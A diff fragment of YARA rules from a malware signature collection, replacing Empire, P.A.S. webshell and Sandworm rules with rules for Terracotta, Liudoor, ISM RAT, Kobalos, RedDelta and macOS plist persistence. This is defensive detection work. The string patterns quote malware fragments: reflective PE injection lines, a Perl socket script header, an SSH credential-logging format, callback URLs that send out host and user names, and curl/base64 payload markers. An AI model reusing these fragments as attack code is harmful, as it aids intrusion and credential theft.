+		$s3 = "EFGHlGdmaWhrL41sf36BgIOCL6R3dk8=" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7223 and filesize < 80KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Portscan_Gen : FILE
+rule SIGNATURE_BASE_Remoteexec_Tool : FILE
 {
 	meta:
-		description = "Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1"
+		description = "Remote Access Tool used in APT Terracotta"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c2e01780-02d2-57d1-b38e-5c345ebccad6"
-		date = "2016-11-05"
+		id = "c3262147-3455-554c-88fc-b523352efe7f"
+		date = "2015-08-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L502-L517"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta.yar#L47-L65"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "05e786dc42ee5ec56197803577d104595ad6554e028b7633b2f7fdf55a63e27c"
+		hash = "a550131e106ff3c703666f15d55d9bc8c816d1cb9ac1b73c2e29f8aa01e53b78"
+		logic_hash = "951cc65e14c2ff035ccc06d080730b1c25208caa1d30129074a6150557a5cebe"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash2 = "cf7030be01fab47e79e4afc9e0d4857479b06a5f68654717f3bc1bc67a0f38d3"
 
 	strings:
-		$s1 = "Test-Port -h $h -p $Port -timeout $Timeout" fullword ascii
-		$s2 = "1 {$nHosts=10;  $Threads = 32;   $Timeout = 5000 }" fullword ascii
+		$s0 = "cmd.exe /q /c \"%s\"" fullword ascii
+		$s1 = "\\\\.\\pipe\\%s%s%d" fullword ascii
+		$s2 = "This is a service executable! Couldn't start directly." fullword ascii
+		$s3 = "\\\\.\\pipe\\TermHlp_communicaton" fullword ascii
+		$s4 = "TermHlp_stdout" fullword ascii
+		$s5 = "TermHlp_stdin" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 100KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 75KB and 4 of ( $s* )
 }
-rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen4 : FILE
+rule SIGNATURE_BASE_Liudoor_Malware_1 : FILE
 {
 	meta:
-		description = "Detects Empire component"
+		description = "Liudoor Trojan used in Terracotta APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c390638a-0eb1-576d-a08c-203c31d414f3"
-		date = "2016-11-05"
+		id = "ebd5833e-1f5c-5166-aaba-d0be64829e6c"
+		date = "2015-08-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L519-L545"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta.yar#L69-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "314574a463f9cc772702d5e3358f5280b2805298fedb89c14786518a4832d63b"
-		score = 75
+		logic_hash = "9ef9fcc5df910e796d8b015396cf37614982ebbf9be6f6a4a8d271d4263a36a9"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "743c51334f17751cfd881be84b56f648edbdaf31f8186de88d094892edc644a9"
-		hash2 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash3 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash4 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
-		hash5 = "304031aa9eca5a83bdf1f654285d86df79cb3bba4aa8fe1eb680bd5b2878ebf0"
-		hash6 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
-		hash7 = "0218be4323959fc6379489a6a5e030bb9f1de672326e5e5b8844ab5cedfdcf88"
-		hash8 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash9 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
-		hash10 = "fa75cfd57269fbe3ad6bdc545ee57eb19335b0048629c93f1dc1fe1059f60438"
+		hash1 = "deed6e2a31349253143d4069613905e1dfc3ad4589f6987388de13e33ac187fc"
+		hash2 = "4575e7fc8f156d1d499aab5064a4832953cd43795574b4c7b9165cdc92993ce5"
+		hash3 = "ad1a507709c75fe93708ce9ca1227c5fefa812997ed9104ff9adfec62a3ec2bb"
 
 	strings:
-		$s1 = "Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }" fullword ascii
-		$s2 = "# Get a handle to the module specified" fullword ascii
-		$s3 = "$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))" fullword ascii
-		$s4 = "$DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')" fullword ascii
+		$s1 = "svchostdllserver.dll" fullword ascii
+		$s2 = "SvcHostDLL: RegisterServiceCtrlHandler %S failed" fullword ascii
+		$s3 = "\\nbtstat.exe" ascii
+		$s4 = "DataVersionEx" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Credentialinjection_Invoke_Mimikatz_Gen : FILE
+rule SIGNATURE_BASE_Liudoor_Malware_2 : FILE
 {
 	meta:
-		description = "Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1"
+		description = "Liudoor Trojan used in Terracotta APT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d938aadf-6924-5964-9b5a-6bd1b817349f"
-		date = "2016-11-05"
+		id = "30b9d727-ec77-5ead-80dd-6d442478e78b"
+		date = "2015-08-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L547-L563"
+		reference = "https://blogs.rsa.com/terracotta-vpn-enabler-of-advanced-threat-anonymity/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_terracotta.yar#L91-L108"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3210b4407c3209a20d74c8c5af66077cc9b902912ae49253883b7acd87eef1f9"
-		score = 75
-		quality = 60
+		logic_hash = "12cc72fb147f2d580f9f9e2a9bdfbec3f7b0e977871a27ccc941cd0b1aaa634c"
+		score = 70
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash2 = "4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
+		hash1 = "f3fb68b21490ded2ae7327271d3412fbbf9d705c8003a195a705c47c98b43800"
+		hash2 = "e42b8385e1aecd89a94a740a2c7cd5ef157b091fabd52cd6f86e47534ca2863e"
 
 	strings:
-		$s1 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle" fullword ascii
-		$s2 = "$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs" fullword ascii
+		$s0 = "svchostdllserver.dll" fullword ascii
+		$s1 = "Lpykh~mzCCRv|mplpykCCHvq{phlCC\\jmmzqkIzmlvpqCC" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 4000KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Empire_Invoke_Gen : FILE
+rule SIGNATURE_BASE_Trojan_ISMRAT_Gen : FILE
 {
 	meta:
-		description = "Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1"
-		author = "Florian Roth (Nextron Systems)"
-		id = "913f971d-e4e3-55e9-904b-82b25a4e6f0f"
-		date = "2016-11-05"
+		description = "ISM RAT"
+		author = "Ahmed Zaki"
+		id = "e72241ce-d6ee-5cb7-a83d-157161938d83"
+		date = "2017-05-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L565-L582"
+		reference = "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/february/ism-rat/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ism_rat.yar#L9-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "11d00ea1f40d34cfd3417db337a01eca39b0e77049f74f0c591cd1d388a8d194"
+		logic_hash = "c4d26f79b8110e92a5e427de303eca6eaf79765a4c9cc437864dc5160ef2e343"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
-		hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
+		hash1 = "146a112cb01cd4b8e06d36304f6bdf7b"
+		hash2 = "fa3dbe37108b752c38bf5870b5862ce5"
+		hash3 = "bf4b07c7b4a4504c4192bd68476d63b5"
 
 	strings:
-		$s1 = "$Shellcode1 += 0x48" fullword ascii
-		$s2 = "$PEHandle = [IntPtr]::Zero" fullword ascii
+		$s1 = "WinHTTP Example/1.0" wide
+		$s2 = "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0" wide
+		$s3 = "|||Command executed successfully"
+		$dir = /Microsoft\\Windows\\Tmpe[a-z0-9]{2,8}/
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 3000KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Empire_Powershell_Framework_Gen5 : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Kobalos : FILE
 {
 	meta:
-		description = "Detects Empire component"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4c23592e-5788-5b84-995a-028142cbc52f"
-		date = "2016-11-05"
+		description = "Kobalos malware"
+		author = "Marc-Etienne M.Leveille"
+		id = "dfa47e30-c093-57f6-af01-72a2534cc6f4"
+		date = "2020-11-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/adaptivethreat/Empire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_empire.yar#L584-L601"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lnx_kobalos.yar#L32-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "115fffabb09ed00ab46c6f980c3a7727070a303cafa900cc1ce04e3999b6b70e"
+		logic_hash = "48aec47b70633d4c8cb55d90a2e168f3c2027ef27cfe1cd5d30dcdc08a2ff717"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
-		hash2 = "61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
-		hash3 = "eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$s1 = "if ($ExeArgs -ne $null -and $ExeArgs -ne '')" fullword ascii
-		$s2 = "$ExeArgs = \"ReflectiveExe $ExeArgs\"" fullword ascii
+		$encrypted_strings_sizes = {
+            05 00 00 00 09 00 00 00  04 00 00 00 06 00 00 00
+            08 00 00 00 08 00 00 00  02 00 00 00 02 00 00 00
+            01 00 00 00 01 00 00 00  05 00 00 00 07 00 00 00
+            05 00 00 00 05 00 00 00  05 00 00 00 0A 00 00 00
+        }
+		$password_md5_digest = { 3ADD48192654BD558A4A4CED9C255C4C }
+		$rsa_512_mod_header = { 10 11 02 00 09 02 00 }
+		$strings_rc4_key = { AE0E05090F3AC2B50B1BC6E91D2FE3CE }
 
 	condition:
-		( uint16( 0 ) == 0x7566 and filesize < 1000KB and 1 of them ) or all of them
+		uint16( 0 ) == 0x457f and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Kobalos_SSH_Credential_Stealer : FILE
 {
 	meta:
-		description = "Detects P.A.S. PHP webshell - Based on DHS/FBI JAR-16-2029 (Grizzly  Steppe)"
-		author = "FR/ANSSI/SDO (modified by Florian Roth)"
-		id = "862aab77-936e-524c-8669-4f48730f4ed5"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L10-L28"
+		description = "Kobalos SSH credential stealer seen in OpenSSH client"
+		author = "Marc-Etienne M.Leveille"
+		id = "0f923f92-c5d8-500d-9a2e-634ca7945c5c"
+		date = "2020-11-02"
+		modified = "2023-12-05"
+		reference = "https://github.com/eset/malware-ioc/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lnx_kobalos.yar#L59-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "977ee0fdf0e92ccea6b71fea7b2c7aed2965c6966d8af86230ccb0f95b286694"
-		score = 70
+		logic_hash = "fdabaea0c838e43b8716bcd102bdeebf2f08fc041b0b909333e3d9d6f94391fc"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$php = "<?php"
-		$strreplace = "(str_replace("
-		$md5 = ".substr(md5(strrev($"
-		$gzinflate = "gzinflate"
-		$cookie = "_COOKIE"
-		$isset = "isset"
+		$ = "user: %.128s host: %.128s port %05d user: %.128s password: %.128s"
 
 	condition:
-		( filesize > 20KB and filesize < 200KB ) and all of them
+		uint16( 0 ) == 0x457f and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Ziparchivefile
+rule SIGNATURE_BASE_SUSP_Macos_Plist_Suspicious : FILE
 {
 	meta:
-		description = "Detects an archive file created by P.A.S. for download operation"
-		author = "FR/ANSSI/SDO (modified by Florian Roth)"
-		id = "081cc65b-e51c-59fc-a518-cd986e8ee2f7"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L30-L42"
+		description = "Suspicious PLIST files in MacOS (possible malware persistence)"
+		author = "John Lambert @JohnLaTwC"
+		id = "61b5986d-35c9-5e1a-a077-14cecdbed36f"
+		date = "2018-12-14"
+		modified = "2025-06-03"
+		old_rule_name = "gen_malware_MacOS_plist_suspicious"
+		reference = "https://objective-see.com/blog/blog_0x3A.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_malware_MacOS_plist_suspicious.yar#L1-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c15e7022f45ec211ba635d6cd31bab16f4fb0d3038fb19d5765e0f751c14a826"
-		score = 80
-		quality = 85
-		tags = ""
+		logic_hash = "52076ec107b5bcbbe35265dfc4034a6a25a453459d22392848980b22115f68bc"
+		score = 60
+		quality = 58
+		tags = "FILE"
+		hash1 = "0541fc6a11f4226d52ae3d4158deb8f50ed61b25bb5f889d446102e1ee57b76d"
+		hash2 = "6cc6abec7d203f99c43ce16630edc39451428d280b02739757f17fd01fc7dca3"
+		hash3 = "76eb97aba93979be06dbf0a872518f9514d0bb20b680c887d6fd5cc79dce3681"
+		hash4 = "8921e3f1955f7141d1231f8cfd95230143525f259e578fdc1dd98494f62ec4a1"
+		hash5 = "9a3fd0d2b0bca7d2f7e3c70cb15a7005a1afa1ce78371fd3fa9c526a288b64ce"
+		hash6 = "737355121685afc38854413d8a1657886f9aa24f54673953749386defe843017"
+		hash7 = "9b77622653934995ee8bb5562df311f5bb6d6719933e2671fe231a664da76d30"
+		hash8 = "c449f8115b4b939271cb92008a497457e1ab1cf2cbd8f4b58f7ba955cf5624f0"
+		hash9 = "cdb2fb9c8e84f0140824403ec32a2431fb357cd0f184c1790152834cc3ad3c1b"
 
 	strings:
-		$s1 = "Archive created by P.A.S. v."
+		$sr1 = "PropertyList-"
+		$sr2 = "<plist"
+		$p1 = "python" ascii
+		$p2 = "<string>-c" ascii
+		$v0 = /\<string\>[\/|\w]{0,20}\+[\/|\+|=|\w]{59,80}\<\/string\>/
+		$v1 = "curl " fullword
+		$v2 = "PAYLOAD_DATA"
+		$v3 = "base64"
+		$vb640 = /(AAQQBZAEwATwBBAEQAXwBCAEEAUwBFADYANA|AEEAWQBMAE8AQQBEAF8AQgBBAFMARQA2ADQA|BBWUxPQURfQkFTRTY0|QVlMT0FEX0JBU0U2N|UABBAFkATABPAEEARABfAEIAQQBTAEUANgA0A|UEFZTE9BRF9CQVNFNj)/
+		$vb641 = /(AHUAYgBwAHIAbwBjAGUAcwBzA|c3VicHJvY2Vzc|cwB1AGIAcAByAG8AYwBlAHMAcw|dWJwcm9jZXNz|MAdQBiAHAAcgBvAGMAZQBzAHMA|N1YnByb2Nlc3)/
+		$vb642 = "IyEvdXNy"
+		$vb643 = "IyAtKi0"
+		$vb644 = /(AGQAZABfAGgAZQBhAGQAZQByA|EAZABkAF8AaABlAGEAZABlAHIA|FkZF9oZWFkZX|YQBkAGQAXwBoAGUAYQBkAGUAcg|YWRkX2hlYWRlc|ZGRfaGVhZGVy)/
+		$fp1 = "&#10;do&#10;&#09;echo"
+		$fp2 = "<string>com.cisco.base64</string>"
+		$fp3 = "video/mp4;base64"
+		$fp4 = "<key>Content-Length</key>"
+		$fp5 = "<string>yara</string>"
+		$fp6 = "<key>Frameworks/base64.framework</key>" ascii
+		$fp7 = "<key>Headers/base64.h</key>" ascii
+		$fp8 = "database64" ascii fullword
+		$fp9 = "<!-- last arg will be replaced by the installer script -->" ascii
+		$fp10 = "<key>/usr/local/bin/python</key>"
+		$fp11 = "<key>/usr/bin/ruby</key>"
+		$fp12 = "installer script"
+		$fp13 = "backupgridsoftware."
+		$fp14 = "<string>3d45fa493e6db1537783a6ad37e464a9</string>"
+		$fp15 = "<string>1815ecf78ce641b94f44d751588ed3ed</string>"
+		$fp16 = "<string>3df5ea4616954ada685d14179e43c4aa</string>"
+		$fp17 = "<string>1PasswordSafariAppExtension</string>"
 
 	condition:
-		$s1
+		filesize < 20KB and uint32be( 0 ) == 0x3c3f786d and all of ( $sr* ) and @sr2 [ 1 ] < 0x100 and ( 1 of ( $v* ) or all of ( $p* ) ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Perlnetworkscript : FILE
+rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_1 : FILE
 {
 	meta:
-		description = "Detects PERL scripts created by P.A.S. webshell"
-		author = "FR/ANSSI/SDO"
-		id = "1625b63f-ead7-5712-92b4-0ce6ecc49fd4"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L44-L62"
+		description = "Detects Red Delta samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "47417488-e843-5346-9baa-fcce30b884d1"
+		date = "2020-10-14"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_reddelta.yar#L2-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b170c07a005e737c8069f2cc63f869d4d3ff6593b3bfca5bcaf02d7808da6852"
-		score = 90
+		logic_hash = "1f2406563b863b8ccd0fd8d8d33c576c4b82dabb55a1e4fa8291859323389834"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "30b2bbce0ca4cb066721c94a64e2c37b7825dd72fc19c20eb0ab156bea0f8efc"
+		hash2 = "42ed73b1d5cc49e09136ec05befabe0860002c97eb94e9bad145e4ea5b8be2e2"
+		hash3 = "480a8c883006232361c5812af85de9799b1182f1b52145ccfced4fa21b6daafa"
+		hash4 = "7ea7c6406c5a80d3c15511c4d97ec1e45813e9c58431f386710d0486c4898b98"
 
 	strings:
-		$pl_start = "#!/usr/bin/perl\n$SIG{'CHLD'}='IGNORE'; use IO::Socket; use FileHandle;"
-		$pl_status = "$o=\" [OK]\";$e=\" Error: \""
-		$pl_socket = "socket(SOCKET, PF_INET, SOCK_STREAM,$tcp) or die print \"$l$e$!$l"
-		$msg1 = "print \"$l OK! I\\'m successful connected.$l\""
-		$msg2 = "print \"$l OK! I\\'m accept connection.$l\""
+		$x1 = "InjectShellCode" ascii fullword
+		$s1 = "DotNetLoader.exe" wide ascii fullword
+		$s2 = "clipboardinject" ascii fullword
+		$s3 = "download.php?raw=1" wide
+		$s4 = "Windows NT\\CurrentVersion\\AppCompatFlags\\TelemetryController\\Levint" wide
+		$s5 = "FlashUpdate.exe" wide
+		$s6 = "raw_cc_url" ascii fullword
+		$op1 = { 48 8b 4c 24 78 48 89 01 e9 1a ff ff ff 48 8b 44 }
+		$op2 = { ff ff 00 00 77 2a 8b 44 24 38 8b 8c 24 98 }
 
 	condition:
-		filesize < 6000 and ( $pl_start at 0 and all of ( $pl* ) ) or any of ( $msg* )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and $x1 or 3 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PAS_Webshell_Sqldumpfile
+rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_2 : FILE
 {
 	meta:
-		description = "Detects SQL dump file created by P.A.S. webshell"
-		author = "FR/ANSSI/SDO"
-		id = "4c26feeb-3031-5c91-9eeb-4b5fe9702e39"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L64-L76"
+		description = "Detects Red Delta samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "acb1024a-64af-51ac-84c8-7fe9a5bd4538"
+		date = "2020-10-14"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_reddelta.yar#L31-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c34abcada22fdf462fd66cc2da18ab9e54215defc6f7a7a95b5a80d1155a2ffe"
-		score = 90
+		logic_hash = "179265c0b2175bc3d2d581a69e50e9b8b9cc918a6fdc7bcef42fb163c49b077a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "260ebbf392498d00d767a5c5ba695e1a124057c1c01fff2ae76db7853fe4255b"
+		hash2 = "9ccb4ed133be5c9c554027347ad8b722f0b4c3f14bfd947edfe75a015bf085e5"
+		hash3 = "b3fd750484fca838813e814db7d6491fea36abe889787fb7cf3fb29d9d9f5429"
 
 	strings:
-		$ = "-- [ SQL Dump created by P.A.S. ] --"
+		$x1 = "\\CLRLoader.exe" wide fullword
+		$x2 = "/callback.php?token=%s&computername=%s&username=%s" ascii fullword
+		$s1 = "DotNetLoader.Program" wide fullword
+		$s2 = "/download.php?api=40" ascii fullword
+		$s3 = "get %d URLDir" ascii fullword
+		$s4 = "Read code failed" ascii fullword
+		$s5 = "OpenFile fail!" wide fullword
+		$s6 = "Writefile success" wide fullword
+		$op1 = { 4c 8d 45 e0 49 8b cc 41 8d 51 c3 e8 34 77 02 00 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $x* ) or 4 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_Key
+rule SIGNATURE_BASE_APT_CN_MAL_Reddelta_Shellcode_Loader_Oct20_3 : FILE
 {
 	meta:
-		description = "Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...]"
-		author = "FR/ANSSI/SDO"
-		id = "8078de62-3dd2-5ee0-8bda-f508e4013144"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L78-L90"
+		description = "Detects Red Delta samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b52836bb-cdef-5416-a8e1-72d0b2298546"
+		date = "2020-10-14"
+		modified = "2022-12-21"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1316387482708119556"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_reddelta.yar#L59-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "056503a2c240a641cd2292a30ab1090e3a358cb4d57dca83b836ecb1bc62ed6b"
-		score = 80
+		logic_hash = "64402f6265f23abf7d6a711aa888c89386c1a754f12286b0efe5fd5d81f15b01"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "740992d40b84b10aa9640214a4a490e989ea7b869cea27dbbdef544bb33b1048"
 
 	strings:
-		$ = "odhyrfjcnfkdtslt"
+		$s1 = "Taskschd.dll" ascii fullword
+		$s2 = "AddTaskPlanDllVerson.dll" ascii fullword
+		$s3 = "\\FlashUpdate.exe" ascii
+		$s4 = "D:\\Project\\FBIRedTeam" ascii fullword
+		$s5 = "Error %s:%d, ErrorCode: %x" ascii fullword
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 4 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Sandworm_Exaramel_Configuration_Name_Encrypted
+rule SIGNATURE_BASE_Rtf_CVE_2018_0802 : CVE_2018_0802 FILE
 {
 	meta:
-		description = "Detects the specific name of the configuration file in Exaramel malware as seen in sample e1ff72[...]"
-		author = "FR/ANSSI/SDO"
-		id = "1c06f5fc-3435-51cd-92fb-17a4ab6b63ad"
-		date = "2021-02-15"
-		modified = "2024-05-25"
-		reference = "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_sandworm_centreon.yar#L92-L104"
+		description = "Attempts to exploit CVE-2018-0802"
+		author = "Rich Warren"
+		id = "162492a3-d792-5f1c-a143-191c62b54728"
+		date = "2018-01-14"
+		modified = "2023-12-05"
+		reference = "http://www.freebuf.com/vuls/159789.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2018_0802.yar#L2-L14"
